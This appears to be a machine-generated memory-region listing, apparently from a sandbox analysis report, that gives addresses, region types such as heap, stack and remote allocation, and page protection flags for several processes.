page read and write
75EA4FF000
stack
page read and write
1386FA27000
heap
page read and write
7FF5504E9000
unkown
page readonly
21A20221000
unkown
page read and write
28728CBA000
heap
page read and write
2BAAAD47000
unkown
page read and write
1E0855C5000
heap
page read and write
2BAAC6C7000
unkown
page read and write
13800AEC000
trusted library allocation
page read and write
BC093F9000
stack
page read and write
7FF52CFD6000
unkown
page readonly
2BAB2FC5000
unkown
page readonly
7FF5134B1000
unkown
page readonly
7DF486A20000
unkown
page readonly
26A87C40000
heap
page read and write
2530EBB5000
heap
page read and write
21A1F6A3000
heap
page read and write
7FF582B9C000
unkown
page readonly
20411100000
heap
page read and write
2D0D62A0000
trusted library allocation
page read and write
1E086E5D000
heap
page read and write
20410F30000
heap
page read and write
179534E1000
unkown
page readonly
7FF52D133000
unkown
page readonly
7FF52D046000
unkown
page readonly
6ED54FE000
unkown
page readonly
7DF486A21000
unkown
page execute read
7FF52D1E9000
unkown
page readonly
FC84AFE000
stack
page read and write
2D0D5893000
trusted library allocation
page read and write
27618893000
heap
page read and write
20410FBE000
heap
page read and write
26A8843B000
heap
page read and write
2BAAAD0D000
unkown
page read and write
1DDAEA50000
heap
page read and write
287293BF000
heap
page read and write
20411207000
heap
page read and write
2BAAD700000
unkown
page readonly
21A1F6A3000
heap
page read and write
4B5C000
unkown
page read and write
21A20221000
unkown
page read and write
721267E000
stack
page read and write
7FF5812CB000
unkown
page readonly
20410F66000
heap
page read and write
2BAAD2C9000
unkown
page read and write
26A8841E000
heap
page read and write
7FFD9B6D0000
trusted library allocation
page read and write
FC8497E000
stack
page read and write
1F2EC73000
stack
page read and write
27B0860B000
unkown
page read and write
8B389FE000
unkown
page readonly
2BAAC572000
unkown
page read and write
138703FB000
heap
page read and write
1DDAEA49000
heap
page read and write
2BAAD328000
unkown
page read and write
2BAADDF0000
unkown
page read and write
7FF52D14A000
unkown
page readonly
1387046A000
heap
page read and write
2761A6E3000
heap
page read and write
7FF582BDB000
unkown
page readonly
751E000
unkown
page read and write
2761A6E0000
heap
page read and write
20410F84000
heap
page read and write
1DDAEA3E000
heap
page read and write
2BAA7C73000
heap
page read and write
26A8842C000
heap
page read and write
225DC670000
unkown
page readonly
28728CAE000
heap
page read and write
2872ACD4000
heap
page read and write
1E084F91000
heap
page read and write
7DF486AA0000
unkown
page readonly
7FF52CB4E000
unkown
page readonly
7FF5A94FD000
unkown
page readonly
7FFD9BA00000
trusted library allocation
page read and write
1A6103A0000
heap
page read and write
21A20221000
unkown
page read and write
2BAAACE3000
unkown
page read and write
2295CF13000
unkown
page read and write
276188CB000
heap
page read and write
225DBF40000
heap
page read and write
27B08E0B000
unkown
page read and write
7FFD9B6B4000
trusted library allocation
page read and write
2BAAE14D000
unkown
page read and write
2295CD20000
heap
page read and write
21A20221000
unkown
page read and write
2BAAC545000
unkown
page read and write
2BAAF190000
unkown
page read and write
7DF4869B0000
unkown
page readonly
4B56000
unkown
page read and write
737E000
unkown
page read and write
2BAAD36B000
unkown
page read and write
2BAAA569000
unkown
page read and write
1DDAEA50000
heap
page read and write
287293CC000
heap
page read and write
A9257FF000
unkown
page read and write
27B06C3F000
unkown
page read and write
1C8DBAA2000
unkown
page readonly
1E084F25000
heap
page read and write
7FF582B9A000
unkown
page readonly
225DBF71000
unkown
page readonly
2BAAE150000
unkown
page read and write
276188F1000
heap
page read and write
7DF4869F1000
unkown
page execute read
C7E8F3B000
stack
page read and write
21A20221000
unkown
page read and write
2C4E000
unkown
page read and write
2BAAC6C5000
unkown
page read and write
8B3877C000
unkown
page read and write
1DDB0A84000
heap
page read and write
20E8B1C0000
remote allocation
page execute and read and write
1E085465000
heap
page read and write
F25A87F000
stack
page read and write
24D9FFC9000
direct allocation
page readonly
2B30000
heap
page read and write
13801AD3000
trusted library allocation
page read and write
1DDAE9E6000
heap
page read and write
1DDAEA12000
heap
page read and write
1DDAEA3E000
heap
page read and write
13800ADE000
trusted library allocation
page read and write
28728CB0000
heap
page read and write
E2BF1FB000
stack
page read and write
7DF486A90000
unkown
page readonly
1E0855D9000
heap
page read and write
26A87E59000
heap
page read and write
21A20221000
unkown
page read and write
2E90000
unkown
page read and write
2761889D000
heap
page read and write
287293A9000
heap
page read and write
27618E5C000
heap
page read and write
2BAA7CC0000
unkown
page readonly
1DDAEA18000
heap
page read and write
27B00F2E000
unkown
page read and write
2BAAD0F0000
unkown
page read and write
FC84E7B000
stack
page read and write
2EE0000
heap
page read and write
26A87200000
unkown
page read and write
1386FC97000
heap
page read and write
26A87DF9000
heap
page read and write
202BFA40000
heap
page read and write
27B02D2E000
unkown
page read and write
2BAAC55D000
unkown
page read and write
2BAAA0A0000
unkown
page read and write
2BAAE58D000
unkown
page read and write
2BAAC700000
unkown
page read and write
2BAAC5AA000
unkown
page read and write
2BAA7B46000
heap
page read and write
202C0200000
unkown
page read and write
28728CB0000
heap
page read and write
21A20221000
unkown
page read and write
2BAAEBE0000
unkown
page read and write
2BAAC56C000
unkown
page read and write
21A20221000
unkown
page read and write
13801673000
trusted library allocation
page read and write
28728CCE000
heap
page read and write
7FF513559000
unkown
page readonly
6B02AFF000
stack
page read and write
20410FA8000
heap
page read and write
73A0000
unkown
page execute and read and write
28728E30000
heap
page read and write
2C8F000
unkown
page read and write
1DDAECDB000
heap
page read and write
1E0855D0000
heap
page read and write
24D9FFC2000
direct allocation
page readonly
13801A58000
trusted library allocation
page read and write
26A88451000
heap
page read and write
1DDAEA20000
heap
page read and write
27618900000
heap
page read and write
2A660685000
unkown
page read and write
73B0000
unkown
page read and write
7FF513538000
unkown
page readonly
D01AF78000
unkown
page read and write
7FFD9B76C000
trusted library allocation
page execute and read and write
7FF5812F6000
unkown
page readonly
225DCB26000
unkown
page read and write
2D0D578B000
trusted library allocation
page read and write
7FF582BD3000
unkown
page readonly
7FF52D109000
unkown
page readonly
276188CF000
heap
page read and write
1E08546E000
heap
page read and write
7FFD9B6B0000
trusted library allocation
page read and write
21A20221000
unkown
page read and write
7DF486AD0000
unkown
page readonly
2BAB057F000
unkown
page read and write
1DDAE9E4000
heap
page read and write
7DF486AB0000
unkown
page readonly
7FF52D15B000
unkown
page readonly
1F2EEFE000
stack
page read and write
276188EA000
heap
page read and write
27618E75000
heap
page read and write
24D9FFB5000
direct allocation
page readonly
2BAA8051000
unkown
page readonly
1C8EE6E6000
trusted library allocation
page read and write
A92537E000
unkown
page read and write
289C000
stack
page read and write
7FF5132CA000
unkown
page readonly
1E0855D0000
heap
page read and write
1386FC60000
heap
page execute and read and write
2D0D4A2B000
heap
page read and write
24D9FE40000
unkown
page read and write
7FF582B07000
unkown
page readonly
1C8DBF96000
heap
page read and write
27618E5C000
heap
page read and write
27B06C3D000
unkown
page read and write
2BAB2FD0000
unkown
page read and write
1386E02D000
heap
page read and write
24DA1AD0000
unkown
page read and write
225DC010000
heap
page read and write
28728CD4000
heap
page read and write
24D9FED0000
unkown
page read and write
1E0855E2000
heap
page read and write
6ED51FE000
unkown
page readonly
2A66062A000
unkown
page read and write
28728CC0000
heap
page read and write
7FFD9B8A0000
trusted library allocation
page execute and read and write
7FF513435000
unkown
page readonly
2220C4F0000
remote allocation
page execute and read and write
26A88413000
heap
page read and write
287293B4000
heap
page read and write
26A87E79000
heap
page read and write
20410F67000
heap
page read and write
2BAADCC0000
unkown
page readonly
2BAACBB4000
unkown
page read and write
179532E0000
unkown
page readonly
2BAAE599000
unkown
page read and write
721277A000
stack
page read and write
26A88449000
heap
page read and write
28728CD2000
heap
page read and write
2BAAD0C0000
unkown
page readonly
7FFD9B7A6000
trusted library allocation
page execute and read and write
7DF4869F0000
unkown
page readonly
20413004000
heap
page read and write
F25ABF8000
stack
page read and write
27618E30000
heap
page read and write
24D9FF30000
heap
page read and write
2530EBB0000
heap
page read and write
1386FB40000
trusted library allocation
page read and write
26A87E33000
heap
page read and write
21A20221000
unkown
page read and write
2BAAE8FD000
unkown
page read and write
27618E69000
heap
page read and write
2BAAC549000
unkown
page read and write
26A89CD4000
heap
page read and write
23ED9620000
heap
page read and write
7FF52CB5E000
unkown
page readonly
2CA1000
unkown
page readonly
A925679000
unkown
page read and write
7FF581499000
unkown
page readonly
202C0B25000
unkown
page readonly
287293CD000
heap
page read and write
26A8841A000
heap
page read and write
123B8520000
unkown
page execute and read and write
1E08546A000
heap
page read and write
276188B1000
heap
page read and write
1E086E64000
heap
page read and write
27618900000
heap
page read and write
2761A6EE000
heap
page read and write
4C7BF5000
stack
page read and write
276188D6000
heap
page read and write
21A20221000
unkown
page read and write
7FF52D12C000
unkown
page readonly
3280000
heap
page read and write
2BAACADA000
unkown
page read and write
6B02FFB000
stack
page read and write
684C87E000
stack
page read and write
721297D000
stack
page read and write
2BAA94E4000
unkown
page read and write
7FF513581000
unkown
page readonly
2041176E000
heap
page read and write
2530E8B0000
heap
page read and write
2BAAD33E000
unkown
page read and write
7FF5A9549000
unkown
page readonly
7FF513572000
unkown
page readonly
7FF58142A000
unkown
page readonly
1C8DAFBE000
unkown
page readonly
6ED50FE000
unkown
page readonly
2761A850000
heap
page read and write
2BAACB7B000
unkown
page read and write
1380175E000
trusted library allocation
page read and write
1DDAF1F9000
heap
page read and write
2BAAC836000
unkown
page read and write
28728CC8000
heap
page read and write
7FFD9B6B3000
trusted library allocation
page execute and read and write
24D9FD20000
unkown
page read and write
7FF581399000
unkown
page readonly
2D0D49E8000
heap
page read and write
2BAA7960000
unkown
page readonly
13801608000
trusted library allocation
page read and write
1DDAF209000
heap
page read and write
1C8DBE60000
heap
page read and write
1E086E52000
heap
page read and write
2BAA9E50000
unkown
page read and write
2BAAD322000
unkown
page read and write
7FF5812BF000
unkown
page readonly
28728CD4000
heap
page read and write
1E084F25000
heap
page read and write
708F000
unkown
page read and write
26A88459000
heap
page read and write
7FF52D191000
unkown
page readonly
287293B8000
heap
page read and write
1DDAEA12000
heap
page read and write
20410F47000
heap
page read and write
26A87E56000
heap
page read and write
276188C2000
heap
page read and write
2BAAC740000
unkown
page readonly
2BAAA0AD000
unkown
page read and write
287293B4000
heap
page read and write
26A871E0000
heap
page read and write
1E084F8D000
heap
page read and write
2220AB60000
unkown
page execute and read and write
2BAAE5AF000
unkown
page read and write
28728CEE000
heap
page read and write
EADEBFF000
stack
page read and write
1C8DB029000
unkown
page readonly
2BAB05C4000
unkown
page read and write
1386E08C000
heap
page read and write
27618894000
heap
page read and write
21A1F6B0000
heap
page read and write
7E00736C5000
unkown
page readonly
7DF4869C0000
unkown
page readonly
202BF9C0000
unkown
page readonly
123B8520000
remote allocation
page execute and read and write
24D9FFE5000
heap
page read and write
21A1F6A3000
heap
page read and write
C7E99FE000
unkown
page readonly
202BFC89000
unkown
page read and write
7FF52D106000
unkown
page readonly
7FFD9BAE0000
trusted library allocation
page read and write
21A20221000
unkown
page read and write
202BFC2F000
unkown
page read and write
A92557E000
unkown
page read and write
2BAAC6DA000
unkown
page read and write
2872ACCE000
heap
page read and write
2BAAA00A000
unkown
page read and write
27618E5C000
heap
page read and write
2BAAE649000
unkown
page read and write
26A87E64000
heap
page read and write
22D862F5000
heap
page read and write
26A87E49000
heap
page read and write
EADEB7F000
stack
page read and write
21A1F6A3000
heap
page read and write
75DE000
unkown
page read and write
1E4E9F30000
heap
page read and write
258004FB000
unkown
page read and write
7DF4869D0000
unkown
page readonly
C7E9B7E000
stack
page read and write
8B3867E000
unkown
page read and write
4E19000
unkown
page read and write
7FF5504A2000
unkown
page readonly
1E0855E9000
heap
page read and write
26A87D60000
heap
page read and write
7FF512433000
unkown
page readonly
2BAAC4D0000
unkown
page read and write
2BAAD360000
unkown
page read and write
4B04000
unkown
page read and write
28728CA2000
heap
page read and write
1E08546E000
heap
page read and write
813A000
unkown
page read and write
26A88417000
heap
page read and write
27B06C11000
unkown
page read and write
1E086E56000
heap
page read and write
2BAAAD07000
unkown
page read and write
F25AD7C000
stack
page read and write
28728C77000
heap
page read and write
1E08546A000
heap
page read and write
7FF581266000
unkown
page readonly
2BAAD32D000
unkown
page read and write
26A871B0000
heap
page read and write
27B06C33000
unkown
page read and write
1DDAF1F9000
heap
page read and write
28728CC2000
heap
page read and write
20412FF4000
heap
page read and write
2BAACB57000
unkown
page read and write
202C0390000
unkown
page read and write
20410F84000
heap
page read and write
26A8843B000
heap
page read and write
7FF5122F1000
unkown
page readonly
138010AF000
trusted library allocation
page read and write
287293BF000
heap
page read and write
28728CCB000
heap
page read and write
2BAA94BB000
unkown
page read and write
1F2FE8E000
stack
page read and write
2D0D57EB000
trusted library allocation
page read and write
765D000
unkown
page read and write
7FF581388000
unkown
page readonly
7FFD9B6C4000
trusted library allocation
page read and write
179532D0000
heap
page read and write
2041176E000
heap
page read and write
225DC9B0000
unkown
page read and write
2BAAAD43000
unkown
page read and write
70CD000
unkown
page read and write
2B00000
unkown
page readonly
21A20221000
unkown
page read and write
2BAA7B36000
heap
page read and write
1E084F07000
heap
page read and write
3110000
heap
page read and write
2BAADCE0000
unkown
page readonly
26A8844B000
heap
page read and write
7DF4869D1000
unkown
page execute read
202BF9B0000
unkown
page readonly
2BAAAC32000
unkown
page read and write
276187C0000
heap
page read and write
20411758000
heap
page read and write
27618872000
heap
page read and write
1DDAE9B0000
heap
page read and write
2BAB0686000
unkown
page read and write
2BAAC626000
unkown
page read and write
21A20221000
unkown
page read and write
7FF52D115000
unkown
page readonly
26A87E79000
heap
page read and write
2BAAED70000
unkown
page read and write
1E084E10000
heap
page read and write
2041175C000
heap
page read and write
C19D87F000
stack
page read and write
225DBF50000
unkown
page read and write
7FF52D18B000
unkown
page readonly
28728CD3000
heap
page read and write
2BAAA522000
unkown
page read and write
1C8EE4F9000
trusted library allocation
page read and write
225DC5C0000
unkown
page write copy
7FF581441000
unkown
page readonly
27618897000
heap
page read and write
2BAAA00C000
unkown
page read and write
26A87B02000
unkown
page read and write
20410FA3000
heap
page read and write
287293C9000
heap
page read and write
20410FA3000
heap
page read and write
26A88451000
heap
page read and write
21A20221000
unkown
page read and write
7FF582BD8000
unkown
page readonly
13801152000
trusted library allocation
page read and write
20411200000
heap
page read and write
7FF582C09000
unkown
page readonly
138702F5000
heap
page read and write
6B029FF000
stack
page read and write
21A20221000
unkown
page read and write
7FF52D188000
unkown
page readonly
1DDAECD5000
heap
page read and write
7FF52CDF0000
unkown
page readonly
7FF5135F6000
unkown
page readonly
2295CF02000
unkown
page read and write
24D9FD40000
heap
page read and write
21A20221000
unkown
page read and write
EDEC4FF000
stack
page read and write
7FF5A9377000
unkown
page readonly
27B07E0B000
unkown
page read and write
27618E3A000
heap
page read and write
2BAAE8BF000
unkown
page read and write
D01BD4B000
unkown
page read and write
1DDB0C10000
heap
page read and write
26A88414000
heap
page read and write
7FFD9B910000
trusted library allocation
page read and write
2BAAEB43000
unkown
page read and write
2BAAAC0E000
unkown
page read and write
26A87D80000
trusted library allocation
page read and write
21A20221000
unkown
page read and write
8230000
heap
page read and write
1DDAEBA0000
trusted library allocation
page read and write
1DDAE9EE000
heap
page read and write
7DF4869B1000
unkown
page execute read
1DDAEA50000
heap
page read and write
EDEC67F000
stack
page read and write
26A87E51000
heap
page read and write
1DDB0A77000
heap
page read and write
7FF582C17000
unkown
page readonly
7453000
unkown
page read and write
17953770000
unkown
page execute and read and write
2BAAD140000
unkown
page read and write
27618E6B000
heap
page read and write
202C0600000
unkown
page readonly
7FF5123A5000
unkown
page readonly
7FF5814A7000
unkown
page readonly
7FFD9B861000
trusted library allocation
page read and write
7FF5122EB000
unkown
page readonly
27618860000
heap
page read and write
1386E220000
heap
page read and write
27B00087000
unkown
page read and write
1386E0B4000
heap
page read and write
2BAAC5AE000
unkown
page read and write
1DDAEA50000
heap
page read and write
7211F8E000
unkown
page readonly
7FF565FEC000
unkown
page readonly
E2BE67B000
stack
page read and write
13801A92000
trusted library allocation
page read and write
1DDAF1ED000
heap
page read and write
26A88417000
heap
page read and write
72126FE000
unkown
page readonly
7FF5123D1000
unkown
page readonly
7FFD9B8E0000
trusted library allocation
page read and write
F25AF7E000
stack
page read and write
2BAACA10000
unkown
page read and write
2BAAC720000
unkown
page readonly
28728CFB000
heap
page read and write
2F90000
heap
page read and write
202C03D7000
unkown
page read and write
2BAADCB0000
unkown
page readonly
5A91000
unkown
page read and write
7DFE21ABD000
unkown
page readonly
287293D5000
heap
page read and write
1DDAED45000
heap
page read and write
1E084F3F000
heap
page read and write
FC84A7E000
stack
page read and write
2BAB2FB0000
unkown
page readonly
2295CE40000
unkown
page read and write
20410F8B000
heap
page read and write
28728C60000
heap
page read and write
208442D0000
unkown
page execute and read and write
8B38C7E000
stack
page read and write
1E084F02000
heap
page read and write
2BAA7970000
unkown
page read and write
2295CE78000
unkown
page read and write
7FF581331000
unkown
page readonly
2BAAE59B000
unkown
page read and write
2872ACC7000
heap
page read and write
1C8DBF5D000
heap
page read and write
1E086E50000
heap
page read and write
20410FC1000
heap
page read and write
21A20221000
unkown
page read and write
7FF52D00A000
unkown
page readonly
287293C9000
heap
page read and write
26A871C0000
unkown
page readonly
26A8842E000
heap
page read and write
A9259FE000
unkown
page read and write
1DDAE9E5000
heap
page read and write
27618E5C000
heap
page read and write
2BAAE16D000
unkown
page read and write
22D862F0000
heap
page read and write
2D0D4BB0000
trusted library allocation
page read and write
21A20221000
unkown
page read and write
7FF513546000
unkown
page readonly
26A88427000
heap
page read and write
21A20221000
unkown
page read and write
1DDAEA08000
heap
page read and write
76D0000
unkown
page read and write
2BAAD34B000
unkown
page read and write
20412FF0000
heap
page read and write
20411789000
heap
page read and write
7442000
unkown
page read and write
26A88459000
heap
page read and write
27618790000
heap
page read and write
21A1F6A3000
heap
page read and write
225DC610000
unkown
page execute and read and write
202BFC6E000
unkown
page read and write
7FFDE21F0000
unkown
page execute read
2D0D5147000
heap
page read and write
7FF5812B0000
unkown
page readonly
2BAAC61C000
unkown
page read and write
2BAAE3A0000
unkown
page read and write
20411207000
heap
page read and write
2BAAE589000
unkown
page read and write
20410FA9000
heap
page read and write
138018EE000
trusted library allocation
page read and write
225DC375000
heap
page read and write
27618868000
heap
page read and write
2295CE21000
unkown
page read and write
28728CCA000
heap
page read and write
1DDAEA0D000
heap
page read and write
7FF5122E8000
unkown
page readonly
2BAAD35A000
unkown
page read and write
225DCB19000
unkown
page read and write
27618E3B000
heap
page read and write
20411779000
heap
page read and write
2BAADCF0000
unkown
page readonly
13810086000
trusted library allocation
page read and write
1F2ECFE000
unkown
page read and write
7FF5814D6000
unkown
page readonly
7E007363F000
unkown
page readonly
202C0478000
unkown
page read and write
1C8DBD60000
heap
page read and write
26A88437000
heap
page read and write
2BAAD339000
unkown
page read and write
1F2ED7E000
stack
page read and write
1E085467000
heap
page read and write
2FBE000
heap
page read and write
26A89CC1000
heap
page read and write
17953000000
unkown
page read and write
13801290000
trusted library allocation
page read and write
1C8DBF5F000
heap
page read and write
17953681000
unkown
page readonly
2BAACB91000
unkown
page read and write
1E084F4D000
heap
page read and write
24D9FFA0000
direct allocation
page readonly
1DDB0A70000
heap
page read and write
21A20221000
unkown
page read and write
1DDAEBA0000
trusted library allocation
page read and write
28728CB3000
heap
page read and write
1E085460000
heap
page read and write
1E08508D000
heap
page read and write
2BAAC7CF000
unkown
page read and write
7FF52CDEB000
unkown
page readonly
2BAA950E000
unkown
page read and write
2C90000
unkown
page read and write
1E084F48000
heap
page read and write
21A20221000
unkown
page read and write
28728CB3000
heap
page read and write
48FE000
unkown
page read and write
1DDB0A75000
heap
page read and write
2BAA7900000
unkown
page readonly
7FFD9BB30000
trusted library allocation
page read and write
28728EB2000
heap
page read and write
2BAAE2E0000
unkown
page read and write
2BAAACA1000
unkown
page read and write
2BAAC578000
unkown
page read and write
20413004000
heap
page read and write
21A20221000
unkown
page read and write
1C8DC1E0000
heap
page read and write
7FF581278000
unkown
page readonly
7DF4F62B0000
trusted library allocation
page execute and read and write
2BAAC638000
unkown
page read and write
1A610200000
heap
page read and write
7212C7E000
stack
page read and write
2BAAC9A8000
unkown
page read and write
4B8E000
unkown
page read and write
17952F60000
unkown
page readonly
2BAAE5A7000
unkown
page read and write
A9256F8000
unkown
page read and write
202C0B10000
unkown
page readonly
8C9AAFD000
stack
page read and write
202C0466000
unkown
page read and write
26A88430000
heap
page read and write
1C8F61B0000
heap
page read and write
27B0820B000
unkown
page read and write
72125FE000
unkown
page readonly
7FFD9B9B0000
trusted library allocation
page read and write
138019C4000
trusted library allocation
page read and write
7670000
unkown
page execute and read and write
1DDAEA12000
heap
page read and write
1DDAEA10000
heap
page read and write
2BAAD4EE000
unkown
page read and write
2D0D4BC0000
heap
page readonly
7FFD9BA04000
trusted library allocation
page read and write
7FF58145F000
unkown
page readonly
2BAAAD34000
unkown
page read and write
7FF52D11D000
unkown
page readonly
1DDAEA04000
heap
page read and write
1DDB0A7E000
heap
page read and write
7FF52D159000
unkown
page readonly
1E086E64000
heap
page read and write
7FF512499000
unkown
page readonly
704E000
unkown
page read and write
7FF5504B8000
unkown
page readonly
26A87D50000
heap
page read and write
1DDAF1F9000
heap
page read and write
7FF5812A4000
unkown
page readonly
27618E47000
heap
page read and write
20411779000
heap
page read and write
26A88459000
heap
page read and write
2BAAD130000
unkown
page readonly
276188E5000
heap
page read and write
2BAACA8C000
unkown
page read and write
7FFD9BB10000
trusted library allocation
page read and write
2BAA9560000
unkown
page read and write
2EA4000
unkown
page read and write
7FF582B09000
unkown
page readonly
2BAACAB4000
unkown
page read and write
1A6102A0000
heap
page read and write
7FF550482000
unkown
page readonly
2BAAE3DA000
unkown
page read and write
1E084EF8000
heap
page read and write
138701B9000
heap
page read and write
27618E54000
heap
page read and write
28728CBC000
heap
page read and write
27618E79000
heap
page read and write
7FF5813AA000
unkown
page readonly
F25AB7F000
stack
page read and write
7FF5504F7000
unkown
page readonly
2BAAED9E000
unkown
page read and write
2BAAC568000
unkown
page read and write
2BAACB5C000
unkown
page read and write
7FF58276E000
unkown
page readonly
2EA0000
unkown
page read and write
1C8EDAF9000
trusted library allocation
page read and write
2BAA7BF0000
unkown
page readonly
684C397000
stack
page read and write
1C8DBED0000
trusted library allocation
page read and write
1E084F4C000
heap
page read and write
7FF513552000
unkown
page readonly
1DDAECD4000
heap
page read and write
1E08508B000
heap
page read and write
1E0855C4000
heap
page read and write
76C0000
unkown
page read and write
22D86010000
heap
page read and write
2295CCC0000
unkown
page readonly
2BAAD540000
unkown
page read and write
21A20221000
unkown
page read and write
1F2F079000
stack
page read and write
20410EE0000
heap
page read and write
2BAAC7CC000
unkown
page read and write
2BAA7CA0000
unkown
page readonly
7FF52D14C000
unkown
page readonly
1E084F8A000
heap
page read and write
23ED95C0000
heap
page read and write
27B0232E000
unkown
page read and write
29A0000
heap
page read and write
27618E73000
heap
page read and write
20410F00000
trusted library allocation
page read and write
7FFD9B9E3000
trusted library allocation
page read and write
7FF5813D5000
unkown
page readonly
7FF5A94BE000
unkown
page readonly
20411203000
heap
page read and write
1A6102AC000
heap
page read and write
24D9FF90000
direct allocation
page read and write
27618895000
heap
page read and write
2BAAED50000
unkown
page readonly
2BAAD780000
unkown
page read and write
26A88430000
heap
page read and write
7690000
heap
page read and write
26A87E8A000
heap
page read and write
7FFD9B6D2000
trusted library allocation
page read and write
276188B1000
heap
page read and write
20410F69000
heap
page read and write
7660000
unkown
page read and write
20410F84000
heap
page read and write
2A66063E000
unkown
page read and write
7FFD9B770000
trusted library allocation
page read and write
21A20221000
unkown
page read and write
7FF58146B000
unkown
page readonly
2761A6F4000
heap
page read and write
D01ABFE000
unkown
page read and write
276188B1000
heap
page read and write
13800FA3000
trusted library allocation
page read and write
1380171A000
trusted library allocation
page read and write
276188C7000
heap
page read and write
20410F86000
heap
page read and write
1DDB0A7E000
heap
page read and write
2BAAD741000
unkown
page read and write
1C8EE6C5000
trusted library allocation
page read and write
2A660656000
unkown
page read and write
7FF582621000
unkown
page readonly
20410F82000
heap
page read and write
26A89CC4000
heap
page read and write
2D0D49A0000
heap
page read and write
4AC0000
unkown
page read and write
2A660A13000
unkown
page read and write
1380178F000
trusted library allocation
page read and write
21A20221000
unkown
page read and write
1F2EE7A000
stack
page read and write
7212A79000
stack
page read and write
26A87E5F000
heap
page read and write
2BAAD170000
unkown
page readonly
138016BD000
trusted library allocation
page read and write
225DC370000
heap
page read and write
1E085463000
heap
page read and write
7DF486A30000
unkown
page readonly
7FF5124A0000
unkown
page readonly
27618E40000
heap
page read and write
7FF582C01000
unkown
page readonly
1F2FF0C000
stack
page read and write
28728CFF000
heap
page read and write
2BAAC534000
unkown
page read and write
2BAACB0E000
unkown
page read and write
D01AB7E000
unkown
page read and write
7DF4F62A0000
trusted library allocation
page execute and read and write
C5F6DFE000
unkown
page readonly
7FFD9B780000
trusted library allocation
page execute and read and write
2BAAD190000
unkown
page read and write
4C9FFE000
stack
page read and write
1386FBC5000
heap
page read and write
26A88448000
heap
page read and write
D01AC7D000
unkown
page read and write
21A20221000
unkown
page read and write
4CABFE000
stack
page read and write
7FF581334000
unkown
page readonly
2ED0000
heap
page read and write
1C8DBFA9000
heap
page read and write
21A20221000
unkown
page read and write
7FFD9B6C3000
trusted library allocation
page execute and read and write
2A660662000
unkown
page read and write
202BFB50000
heap
page read and write
26A87240000
unkown
page read and write
4A80000
heap
page execute and read and write
28728CA2000
heap
page read and write
2D0D4B90000
trusted library allocation
page read and write
1C8DBE80000
heap
page read and write
27B06C36000
unkown
page read and write
1E0855E4000
heap
page read and write
20410FC1000
heap
page read and write
28728CFF000
heap
page read and write
287293BF000
heap
page read and write
24D9FF92000
direct allocation
page readonly
7FF5A94F1000
unkown
page readonly
1C8DC0E0000
heap
page read and write
7FF512477000
unkown
page readonly
2BAAE5A1000
unkown
page read and write
A925479000
unkown
page read and write
8160000
unkown
page read and write
21A20221000
unkown
page read and write
1DDAED40000
heap
page read and write
4B51000
unkown
page read and write
1DDB0A71000
heap
page read and write
13801282000
trusted library allocation
page read and write
24DA1B2A000
unkown
page read and write
2BAAC9F7000
unkown
page read and write
7FFDE21F0000
unkown
page execute read
7DF4869E0000
unkown
page readonly
1E08546B000
heap
page read and write
20410F84000
heap
page read and write
C7E8FBE000
unkown
page readonly
2BAAE58B000
unkown
page read and write
1386E000000
heap
page read and write
8B3897E000
unkown
page read and write
26A87E80000
heap
page read and write
1DDAEA34000
heap
page read and write
2BAA7AF0000
heap
page read and write
7FF581397000
unkown
page readonly
2BAB05E9000
unkown
page read and write
2A660676000
unkown
page read and write
7FFD9B900000
trusted library allocation
page read and write
7FF5504B1000
unkown
page readonly
C5F6AF8000
stack
page read and write
C19D9FF000
stack
page read and write
A92587F000
unkown
page read and write
2041176E000
heap
page read and write
2BAB2FD2000
unkown
page readonly
2872ACCE000
heap
page read and write
2BAAD730000
unkown
page read and write
202C0459000
unkown
page read and write
26A87E43000
heap
page read and write
2BAAE343000
unkown
page read and write
20410F8E000
heap
page read and write
2A6612D0000
unkown
page execute and read and write
FC847FF000
stack
page read and write
2BAAE59F000
unkown
page read and write
2BAAAD30000
unkown
page read and write
1E4E9EC0000
heap
page read and write
1386FBA7000
heap
page execute and read and write
1E084F59000
heap
page read and write
2BAAC61F000
unkown
page read and write
28728F1B000
heap
page read and write
7FF5A9580000
unkown
page readonly
20410FB8000
heap
page read and write
28728CC8000
heap
page read and write
2530E9C0000
heap
page read and write
3F99E7F000
stack
page read and write
7FF512422000
unkown
page readonly
2872ACB0000
heap
page read and write
BC0967E000
unkown
page readonly
26A87302000
unkown
page read and write
13810084000
trusted library allocation
page read and write
20411205000
heap
page read and write
27618877000
heap
page read and write
1E4E9EF0000
heap
page read and write
A9251E4000
unkown
page read and write
2BAAE2F0000
unkown
page read and write
2CF0000
heap
page read and write
1DDAE9F2000
heap
page read and write
27B06C0D000
unkown
page read and write
1386E07A000
heap
page read and write
7FF5A9586000
unkown
page readonly
7FF58137A000
unkown
page readonly
7FFD9B6D4000
trusted library allocation
page read and write
7FF581436000
unkown
page readonly
5AB9000
unkown
page read and write
2E3E000
unkown
page read and write
27B0720B000
unkown
page read and write
21A1F6A6000
heap
page read and write
75EA47F000
stack
page read and write
2295D530000
unkown
page execute and read and write
28728EB4000
heap
page read and write
276188D6000
heap
page read and write
7FF51241E000
unkown
page readonly
2BAAC622000
unkown
page read and write
4ADC000
unkown
page read and write
26A87E34000
heap
page read and write
1386E06E000
heap
page read and write
26A8722B000
unkown
page read and write
BC0947E000
unkown
page readonly
21A20221000
unkown
page read and write
26A87E5F000
heap
page read and write
2872ACCE000
heap
page read and write
1DDAEA25000
heap
page read and write
276188EA000
heap
page read and write
7FF5A9579000
unkown
page readonly
1E084F8C000
heap
page read and write
202C03CB000
unkown
page read and write
138018B7000
trusted library allocation
page read and write
26A8843B000
heap
page read and write
7FF5135AA000
unkown
page readonly
2041176E000
heap
page read and write
2BAAC566000
unkown
page read and write
2041177C000
heap
page read and write
26A87D5D000
heap
page read and write
204112CB000
heap
page read and write
28728CC7000
heap
page read and write
21A20221000
unkown
page read and write
28728CB0000
heap
page read and write
7DF486A80000
unkown
page readonly
2BAAE597000
unkown
page read and write
13810074000
trusted library allocation
page read and write
1386E225000
heap
page read and write
7FF52D18D000
unkown
page readonly
276188EF000
heap
page read and write
276188C2000
heap
page read and write
1386E074000
heap
page read and write
1386FB10000
trusted library section
page read and write
2BAAE581000
unkown
page read and write
2BAAE591000
unkown
page read and write
1386FC00000
trusted library allocation
page read and write
2BAACA1B000
unkown
page read and write
2530EBBE000
heap
page read and write
A9255FE000
unkown
page read and write
1E084F52000
heap
page read and write
7FF55049E000
unkown
page readonly
26A87E60000
heap
page read and write
7FF5812B6000
unkown
page readonly
2BAAD173000
unkown
page readonly
225DC685000
unkown
page readonly
28728C95000
heap
page read and write
1DDAECD7000
heap
page read and write
13800DFE000
trusted library allocation
page read and write
